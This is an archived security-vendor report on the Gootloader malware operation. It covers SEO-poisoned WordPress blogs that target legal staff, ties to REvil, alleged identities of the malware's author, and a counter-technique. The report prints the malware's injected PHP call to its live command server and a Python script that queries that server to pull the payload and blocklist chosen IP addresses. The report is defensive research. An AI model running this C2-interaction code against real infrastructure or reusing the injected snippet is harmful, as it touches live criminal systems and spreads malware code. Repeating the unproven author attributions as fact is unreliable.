{
	"id": "5e84f4e3-e432-4e9a-a94f-c307601fd8bd",
	"created_at": "2026-04-06T00:14:20.109428Z",
	"updated_at": "2026-04-10T03:23:51.473212Z",
	"deleted_at": null,
	"sha1_hash": "6c95786208d07de30ed2c945bf02f4996ef2db7e",
	"title": "Gootloader Unloaded: Researchers Launch Multi-Pronged Offensive Against Gootloader, Cutting Off Traffic to Thousands of…",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7877885,
	"plain_text": "Gootloader Unloaded: Researchers Launch Multi-Pronged\r\nOffensive Against Gootloader, Cutting Off Traffic to Thousands\r\nof…\r\nArchived: 2026-04-05 17:15:03 UTC\r\neSentire Encourages Security Defenders to Follow their Lead\r\nExecutive Summary\r\neSentire’s Threat Response Unit (TRU), led by researchers Joe Stewart and Keegan Keplinger, have launched a\r\nmulti-pronged offensive against a growing cyberthreat: the Gootloader Initial Access-as-a-Service\r\nOperation. The Gootloader Operation is an expansive cybercrime business, and it has been active since 2018. For\r\nthe past 15 months, the Gootloader Operator has been launching ongoing attacks targeting legal professionals\r\nworking for both law firms and corporate legal departments in the U.S., Canada, the U.K. and Australia. Between\r\nJanuary and March 2023, TRU shut down Gootloader attacks against 12 different organizations, seven of which\r\nwere law firms.\r\nWhile Gootloader might not be a household name like many ransomware threats, the Gootloader Operation is\r\ncompromising organizations across the globe and selling this access to ransomware threat actors and other\r\ncybercriminals. Since Gootloader is a “Gateway to Hands-on Intrusions”, not just annoying, automated adware,\r\nhackers use it to get a foothold in an organization’s IT environment and then spread laterally through the\r\norganization’s network to seed out ransomware or to exfiltrate data.\r\nThe Gootloader Operation is targeting law firms and law professionals because that's where they can find the most\r\nsensitive data that most people want to be kept confidential. It is the kind of data that can damage reputations,\r\ncompromise business deals, expose protected witnesses, and undermine an organization’s legal case. The\r\nCybersecurity and Infrastructure Security Agency (CISA) named it a top malware strain of 2021.\r\nBy using Search Engine Optimization (SEO) poisoning to lure unsuspecting victims to an enormous array of\r\ncompromised WordPress blogs, Gootloader tailors its victim pool to a subset of organizations most likely to pay a\r\nhandsome ransom. Currently, one of these “victim pools” is legal professionals working for law firms and\r\ncorporate legal departments.\r\nGootloader infects legal employees by luring them to blogs, which are populated with content pertaining to “legal\r\nagreements” and “contracts”. When the employee visits the blog, which includes a link to what appears to be a\r\nsample “legal agreement” or “contract”, and they download the file, they are downloading Gootloader.\r\nOne of the most interesting aspects of Stewart and Keplinger’s research was that they were able to use the\r\nGootloader page data to confirm the connection that other security researchers had previously reported: that the\r\nGootloader Operator(s) had been providing Initial Access victims to the notorious Russian-speaking REvil (aka:\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 1 of 12\n\nSodinokibi) Gang. Not only were Stewart and Keplinger able to confirm this connection, but they were also able\r\nto narrow down the timelines of all the REvil-sponsored Gootloader campaigns to the day.\r\nStewart and Keplinger set out to figure out a way of shutting down the growing Gootloader infections, and it\r\nturned out that the Gootloader malware operator, himself, has provided part of the answer. The Operator\r\nimplemented a feature to keep his payloads from being discovered by security researchers and incident\r\nresponders. Stewart and Keplinger discovered that they and other security defenders can use this same tactic to\r\nhide end-users from the Gootloader Operator, thus proactively protecting organizations from being infected.\r\nStewart also built a crawler for finding all the live Gootloader webpages, and eSentire is providing technical\r\ndetails needed to identify these pages with search engine vendors with the goal of blocking these malicious pages,\r\nthus preventing end-users from ever seeing them. This is another way eSentire is proactively trying to protect\r\ncorporate end-users from being infected with Gootloader. eSentire is sharing its methods at the RSA Security\r\nConference in San Francisco the week of April 24th and is encouraging other security defenders to follow its lead.\r\nIntroduction\r\nThe Gootloader Initial Access-as-a-Service operation is an expansive cybercrime business and it has been active\r\nsince 2018. For the past 15 months, the Gootloader Operator has been launching ongoing attacks targeting legal\r\nprofessionals working for both law firms and corporate legal departments in the U.S., Canada, the U.K. and\r\nAustralia. Between January and March 2023, TRU shut down Gootloader attacks against 12 different\r\norganizations, seven of which were law firms.\r\nGootloader might not have a household name like many ransomware threats, however, it is the Gootloader\r\nOperation that is compromising organizations across the globe and selling this access to ransomware threat actors\r\nand other cybercriminals.\r\nSince the Gootloader malware is used as a “Gateway to Hands-on Intrusions”, hackers use it to get a foothold\r\nin an organization’s IT environment and then spread laterally through the organization’s network to seed out\r\nransomware or to exfiltrate data. Gootloader targets law firms and law professionals because that's where they can\r\nfind the most sensitive data that most people want kept confidential. It is the kind of data that can damage\r\nreputations, compromise business deals, expose protected witnesses, and undermine an organization’s legal case.\r\nThe Cybersecurity and Infrastructure Security and Agency (CISA) named it a top malware strain of 2021.\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 2 of 12\n\nREvil Ransomware Gang and the Gootloader Operator(s) – Partners in Crime\r\nOne of the most interesting aspects of Stewart and Keplinger’s research was that they were able to use the\r\nGootloader page data to confirm the connection that other security researchers had previously reported: that the\r\nGootloader Operator(s) had been providing Initial Access victims to the notorious Russian-speaking REvil (aka:\r\nSodinokibi) Gang. Not only were Stewart and Keplinger able to confirm this connection, but they were also able\r\nto narrow down the timelines of all the REvil-sponsored Gootloader campaigns to the day.\r\nREvil is infamous for launching some of the most destructive ransomware attacks worldwide. They not only\r\nattacked private businesses, but they also went after corporations and organizations that are part of critical\r\ninfrastructure sectors. These victims included JBS S.A., the world’s largest meat processing company. The attack\r\ntemporarily shut down their operations in the U.S., Canada, and Australia. According to JBS USA CEO Andre\r\nNogueira, the company paid the REvil threat actors US $11 million in an attempt to “avoid any unforeseen issues\r\nand ensure no data was exfiltrated.”\r\nA second critical infrastructure organization and victim of REvil was Kaseya, a global provider of unified IT \u0026\r\nsecurity management software for IT professionals working as managed service providers (MSPs) and mid-market\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 3 of 12\n\nenterprises (MMEs). MSPs use Kaseya’s solutions to monitor the IT infrastructure for their end-user companies.\r\nSpecifically, the REvil attackers released a fake software update from Kaseya via an authentication bypass\r\nvulnerability, which then spread malware to Kaseya’s MSP customers and then on to their end-user customers.\r\nThe Kaseya attack was a “supply chain ransomware attack”, giving the REvil threat actors access to thousands of\r\ndownstream companies via Kaseya’s network of MSP customers.\r\nStewart and Keplinger have discovered that the Gootloader Operator(s) worked with REvil from 2019 through\r\nJuly 2022. What Stewart and Keplinger have uncovered is that during certain timeframes, the REvil Gang\r\nlaunched ransomware campaigns against speakers of specific languages (Figure 1).\r\nIt was the same language(s) that the Gootloader Operators targeted and during the same time segments as when\r\nthe REvil attacks occurred. For example, in 2019, Gootloader heavily targeted Korean speakers when looking for\r\ntheir Initial Access victims. It was also in 2019 that the REvil Gang began infecting companies in South Korea\r\nwith their ransomware, and they continued these attacks throughout 2019.\r\nFigure 1 - Languages targeted by Gootloader malware between 2019-2023\r\nLikewise, in 2020, TRU found evidence showing that the Gootloader Operator(s) began heavily targeting English\r\nand German speakers and continued focusing on these two victim pools throughout 2021. Coincidently, the REvil\r\nGang was seen attacking German-based organizations and organizations in the U.S., Canada, Australia, and the\r\nU.K. from 2020 through 2021. From the beginning of 2022 and up until September 2022, both Gootloader and\r\nREvil continued targeting English speakers.\r\nCoincidentally, from 2022 to the present, Gootloader has focused largely on English speakers looking for legal\r\nagreements. This specific targeting certainly provides cybercriminals, like REvil, with a pool of extremely high-value victims—law firm employees and employees of corporate legal departments.\r\nIn November 2021, the U.S. Department of the Treasury said the REvil Ransomware Gang had received more\r\nthan USD $200 million in extortion payments, and that their malware had been “deployed” against approximately\r\n175,000 computers worldwide. Stewart and Keplinger believe, with high confidence, that the Gootloader\r\nOperator’s “act of continually feeding victims” to the REvil Gang was absolutely integral to REvil’s success and\r\ntheir ability to extort USD $200 million from their victims. And because Gootloader continues to rack up victims\r\ndaily in the U.S., Canada, the U.K., and Australia, Stewart and Keplinger feel that it is very possible the\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 4 of 12\n\nGootloader Operator is working with another ransomware gang or continuing to work with members of the REvil\r\nGang, who are simply operating under a different group name.\r\nGootloader’s Modus Operandi\r\nBy using Search Engine Optimization (SEO) poisoning to lure unsuspecting victims to an enormous array of\r\ncompromised WordPress blogs, Gootloader tailors its victim pool to a subset of organizations most likely to pay a\r\nhandsome ransom. One of these “victim pools” are legal professionals working for law firms and corporate legal\r\ndepartments.\r\nGootloader infects legal employees by luring them to blogs, which are populated with content pertaining to “legal\r\nagreements” and “contracts.” The employee visits the blog, which includes a link to what appears to be a sample\r\n“legal agreement” or “contract” and when they go to download the file, they are downloading Gootloader (Figure\r\n2).\r\nAs mentioned previously, legal professionals have been a primary target of the Gootloader Operator for the past\r\n15 months, and between January and March 2023, TRU shut down Gootloader attacks against 12 different\r\norganizations, seven of which were law firms.\r\nFigure 2 - Gootloader landing page from a compromised WordPress blog\r\nGootloader’s Origins\r\nThe name Gootloader emerged in 2020 to classify a specific component of the Gootkit malware, largely because\r\nsecurity researchers felt it was unique enough to be classified independently of its primary payload. Gootkit is a\r\nmuch older trojan that first emerged in 2010 (contrary to several published analyses, dating it to 2014).\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 5 of 12\n\nGootkit was a sophisticated banking trojan that targeted financial institutions in Europe, specifically Germany,\r\nAustria, and Switzerland. The trojan was distributed via phishing emails and malicious websites and it had the\r\nability to steal sensitive financial information, including bank login credentials and credit card data.\r\nGootloader was designed to deliver a range of other types of malware to infect systems, including ransomware,\r\nbanking trojans, and spyware Gootkit is alleged to be authored by a Russian developer known as “MZђ”.\r\nGootkit Creator Doxxed by the Author of the Infamous Gameover Zeus Banking\r\nTrojan, Evgeniy Bogachev?\r\nInterestingly, an administrator of the KernelMode forum known as “EP_X0FF” doxxed the Gootkit author in a\r\nforum post, alleging that his real name was Denis Turin, a Russian developer from Tomsk, Russia, later residing in\r\nSt. Petersburg (Figure 3).\r\nFigure 3 - KernelMode post doxxing the Gootkit author\r\nEven more interesting is the fact that EP_X0FF himself has been alleged to be none other than the author of the\r\ninfamous Zeus trojan, Evgeniy Bogachev (Figure 4). Bogachev is also the author of the popular banking trojan,\r\nGameover Zeus. Security experts estimate that Gameover Zeus is responsible for more than 1 million computer\r\ninfections, resulting in financial losses of more than USD $100 million.\r\nOn May 19, 2014, Bogachev was indicted by a federal grand jury in the Western District of Pennsylvania on\r\ncharges of conspiracy, computer fraud, wire fraud, bank fraud, and money laundering. The FBI has a USD $3\r\nmillion reward for information leading to Bogachev’s arrest.\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 6 of 12\n\nFigure 4 - Blog comment alleging EP_X0FF is the author of the Zeus Trojan\r\nNote: no evidence was provided by the commenter “Dimitri” who stated EP_X0FF is Bogachev, and it has since\r\nbeen disputed by a security researcher at Kaspersky Lab.\r\neSentire’s Threat Response Unit (TRU) has uncovered independent evidence linking a circa-2010 Gootkit\r\nCommand and Control Server (C2) to the same individual, alleged by EP_X0FF, to be the Gootkit author, as well\r\nas other pseudonyms such as “freeeez,” “UnW1n,” “ZuwizarD,” and “Patolog.”\r\nHowever, it is possible that the Gootkit/Gootloader code may have changed hands over the last 13 years of its\r\nevolution, so it is unknown if this individual is still currently operating the Gootloader service (Figure 5).\r\nFigure 5 - Evidence linking Gootkit to its alleged author\r\nGootloader’s Stealthy Tactics of Keeping Victims in the Dark\r\nGootloader manages to keep its pool of compromised WordPress blogs producing fresh victims for years in most\r\ncases by using stealth tactics and only showing computer users the malware-laden landing pages under certain\r\ncircumstances.\r\nThe malicious payloads are never displayed to logged-in users of the WordPress site, meaning that the site\r\nadministrators usually have no idea that their blog is compromised and that it is acting as part of the Gootloader\r\nmalware network. The IP addresses of the administrators (and several netblocks above and below their IP\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 7 of 12\n\naddresses) are also blocked, preventing them from viewing the malicious pages on a second visit, even if they are\r\nlogged-out.\r\nThe blocklisting features of Gootloader are also incorporated into the Gootloader “mothership,” the server that\r\ndelivers the malicious payloads to the compromised blog for display to the end-user. Each visitor will only receive\r\nthe payload once, then the IP is blocked by the mothership server for 24 hours – across all Gootloader-compromised blogs.\r\nThis tactic is effective at stymying security researchers or incident response teams to a certain degree, at least until\r\nthey hop on a VPN and try loading the malicious blog post again. However, security teams can use this feature\r\nto their advantage in order to proactively protect their end-users from Gootloader infections.\r\nTurning the Tables: Using Gootloader’s Blocklisting Feature to Protect End-Users\r\nEach time a non-blocked visitor loads a malicious post from a compromised Gootloader blog, specific code is\r\nexecuted on the server, relaying information about the request to the Gootloader mothership:\r\n$request = @wp_remote_retrieve_body(@wp_remote_get(\r\n \"http://my-game.biz/index.php?a=\" . base64_encode($_GET[$qwc4]) . '\u0026b=' . base64_encode($\r\n array(\"timeout\" =\u003e 120)\r\n )\r\n );\r\nThe variables sent in this request are:\r\nA number representing the specific document being viewed by the end-user (likely relayed as a way for the\r\nGootloader author to keep track of which SEO terms are the most effective)\r\nThe IP address of the visiting user (for Geofencing by country and for blocking subsequent requests for one\r\nfull day)\r\nThe browser user-agent string (for use in targeting specific platforms only)\r\nThe HTTP referrer if any\r\nThe Gootloader mothership relies on the compromised blog to tell it the IP address of the visiting user, which it\r\nhas no way of knowing directly. Therefore, it is possible to blocklist any IPv4 address on the Internet from seeing\r\nany malicious Gootloader landing page on the Internet for 24 hours by specially crafting a request to the\r\nGootloader mothership and carefully emulating the above request.\r\nActive Defense\r\nPython code can be used to emulate the PHP traffic from the compromised blog to the Gootloader mothership,\r\nretrieving the malicious payload and getting any desired IPv4 address added to the blocklist.\r\n#!/usr/bin/env python3\r\nfrom collections import OrderedDict\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 8 of 12\n\nfrom base64 import b64encode\r\nimport requests\r\nimport sys\r\nif len(sys.argv) != 5:\r\n print(f\"Usage: {sys.argv[0]} \u003ccompromised blog domain\u003e \u003cWordPress version\u003e \u003carticle ID\u003e \u003cIP to ge\r\n print(f\"Example: {sys.argv[0]} jonas.fi 5.8.6 2268444 1.1.1.1\")\r\n sys.exit(1)\r\nurl = 'http://my-game.biz/index.php' # Gootloader mothership\r\ndomain = sys.argv[1]\r\nwp_version = sys.argv[2]\r\narticle = b64encode(sys.argv[3].encode()).decode()\r\nIP = b64encode(sys.argv[4].encode()).decode()\r\nc = b64encode(b'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/11\r\nd = '' # referrer, not always present\r\nreq = f\"{url}?a={article}\u0026b={IP}\u0026c={c}\u0026d=\"\r\nheaders = OrderedDict([\r\n ('User-Agent', f\"WordPress/{wp_version}; https://{domain}\"),\r\n ('Accept', '*/*'),\r\n ('Accept-Encoding', 'identity'),\r\n ('Referer', req)\r\n])\r\nprint(f\"Sending: {req}\")\r\nresponse = requests.get(req, headers=headers)\r\nprint(response.content)\r\nThe first request made should output the base64-encoded obfuscated Gootloader landing-page payload. A second\r\nrequest made within 12 hours using the same parameters should return an empty response – this indicates the IP\r\nsent in the request was added to the Gootloader blocklist.\r\nOther Active Defense Vectors\r\nThere are additional layers to Gootloader’s blocklist. While we do not have the source code to the Gootloader\r\nmothership, we have observed that in certain cases, Gootloader will not only block the reported IP, but an entire\r\nrange of netblocks above and below that IP address, over 5000 IP addresses in total.\r\nTheoretically, if we can get any chosen IP address added to this more restrictive blocklist, it would only take just\r\nover 800,000 requests to the Gootloader mothership every 24 hours to effectively inoculate 100% of Gootloader’s\r\npotential victim pool by blocking the entire global IPv4 network space by choosing IP addresses at appropriate\r\nnumeric intervals.\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 9 of 12\n\nAnother layer is abusing the blocklist that is part of the code injected into the compromised WordPress blogs. This\r\nblocklist only impacts logged-in users, so it would not be applicable to all the Gootloader landing pages, however,\r\nsome subset of the compromised sites have user registration enabled or use third-party OAUTH logins. Visiting\r\none of the landing pages on such a site, from carefully chosen proxy IP addresses, could allow defenders to block\r\na large swath of the Internet from being infected by the site, and in this case, the blocklist is permanent.\r\neSentire is actively using the defense methods described above to protect its customers. Since implementing these\r\nmeasures, eSentire has not observed any occurrences where our MDR for Network customers have downloaded\r\nGootloader. eSentire is also partnering across its ecosystem and collaborating with technology alliance partners to\r\nensure widespread communication and adoption of these recommendations.\r\nAs mentioned previously, since 2020 the Gootloader Operator has used Search Engine Optimization (SEO)\r\npoisoning to lure unsuspecting victims to thousands of compromised WordPress blogs. Many of these blogs\r\ncontain hundreds of malicious web pages which lead to Gootloader malware.\r\nStewart has located 375,000 malicious URLs across thousands of blogs that have been hijacked by Gootloader.\r\nEnd-users, especially legal professionals, are lured to the blog pages because they are populated with content\r\npertaining to “legal agreements” and “contracts.” The employee visits the blog, goes to download a sample “legal\r\nagreement” or “contract” and they end up downloading Gootloader.\r\nStewart built a crawler for finding all the live Gootloader web pages, and eSentire is providing technical details\r\nneeded to identify these pages with top search engine vendors with the goal of blocking these malicious pages,\r\nthus preventing end-users from ever seeing them.\r\nBeating Gootloader at its Own Game – Taking a Bite Out of the Malware Supply\r\nChain\r\nNo doubt the Gootloader author will read this paper and consider the ramifications to his operation, especially if\r\nthe techniques described are adopted by other MSSPs and security organizations.\r\nAs security researchers, we are continually faced with the same dilemma when publishing countermeasures\r\nagainst malware services – is it better to keep the information secret and hope the malware operator does not\r\nevolve tactics? Or do we share it with the world in hopes of protecting as many people as possible and raising\r\nawareness about the scope of the threat?\r\nSince we have decided to publish the details of the countermeasure, the malware author now has a decision to\r\nmake. First, he needs to consider whether he can detect our injected blocklist Ips from a wide range of sources\r\nand/or does he remove or modify the global blocklisting feature?\r\nAt some point, it becomes an escalating game of cat-and-mouse. Whitehats can employ greater resources to evade\r\nthe available detection measures he may deploy, so ultimately the Gootloader author may need to eliminate the\r\nblocklist or greatly shorten its duration.\r\nEither way, this will be a net win for safety and security, as researchers will more easily be able to detect and\r\nreport the malicious landing pages to the impacted WordPress blog administrators and anti-phishing and browser\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 10 of 12\n\nblocklists, which will ultimately impact Gootloader and its ransomware customers’ bottom line.\r\nKeep Watch for Gootloader’s Indicators of Compromise (IOCs) and Modus\r\nOperandi (MO)\r\n“It is critical for companies’ security teams to quickly identify and remediate Gootloader infections within their\r\nenvironment to prevent follow-on attacks and the deployment of more damaging malware such as ransomware or\r\nCobalt Strike,” said Keplinger. “Being aware of the hacker group’s typical MO, for example, infection process and\r\ntheir IOCs, are key to identifying and shutting down a Gootloader attack.”\r\nGootloader’s Typical Infection Process\r\nUser performs a web search for a document or document template\r\nUser clicks on search result leading to Gootloader landing page\r\nLanding page presents a fake web forum and link to the requested document\r\nUser clicks on the presented link, and receives a Zip archive\r\nUser opens the archive, finds a JavaScript file (.js extension) disguised as the requested document\r\nUser executes the JavaScript file by double-clicking it\r\nWindows executes the JavaScript file using the Windows script host process, resulting in the execution of\r\nthe Gootloader malware\r\nA repository of URLs for current LIVE Gootloader web pages can be found here.\r\neSentire would like to thank the author of the GootloaderSites feed for his assistance with this research. For more\r\ninformation on Gootloader IOCs, follow his blog at https://gootloader.wordpress.com/ and subscribe to his feed on\r\nMastodon at https://ioc.exchange/@GootloaderSites.\r\nDefending Your Company and Employees Against Gootloader\r\nThe Gootloader hackers ensnare their victims because they fool them into downloading documents from\r\nthe Web. Therefore, one of the most important defenses companies can implement against Gootloader is\r\nsecurity awareness training for their employees.\r\nCompanies must educate employees regarding the risk of Gootloader, and more broadly, the security risks\r\ninvolved with using search engines to find and download free document templates.\r\nEmployees need to make sure they can trust document sources. Even legitimate Word and Excel documents\r\nfrom the Internet can lead to malware.\r\nBe wary of Word and Excel documents sent from an unknown source or acquired from the Internet that\r\nprompts you to ‘Enable Macros’.\r\nEmployees need to ensure that the content downloaded is content they intended to download. If one\r\ndownloads a document from the Internet but they are served a JavaScript file, one should not open it. It\r\nshould be escalated to one’s internal IT security team.\r\nEnsure standard procedures are in place for employees to submit potentially malicious content for review.\r\nUse Windows Attack Surface Reduction rules to block JavaScript and VBScript from launching\r\ndownloaded content.\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 11 of 12\n\nEmploy an Endpoint Detection and Response (EDR) solution.\r\nEngage 24/7 threat detection, investigation, and response for continuous security monitoring, complete\r\nvisibility across the attack surface, and access to highly certified security experts.\r\nIf you’re not currently engaged with a Managed Detection and Response provider, we highly recommend you\r\npartner with eSentire MDR to build resilience and disrupt threats before they impact your business.\r\nWant to learn more about how we protect legal firms globally? Connect with an eSentire Security Specialist.\r\nSource: https://www.esentire.com/web-native-pages/gootloader-unloaded\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/web-native-pages/gootloader-unloaded"
	],
	"report_names": [
		"gootloader-unloaded"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434460,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6c95786208d07de30ed2c945bf02f4996ef2db7e.pdf",
		"text": "https://archive.orkl.eu/6c95786208d07de30ed2c945bf02f4996ef2db7e.txt",
		"img": "https://archive.orkl.eu/6c95786208d07de30ed2c945bf02f4996ef2db7e.jpg"
	}
}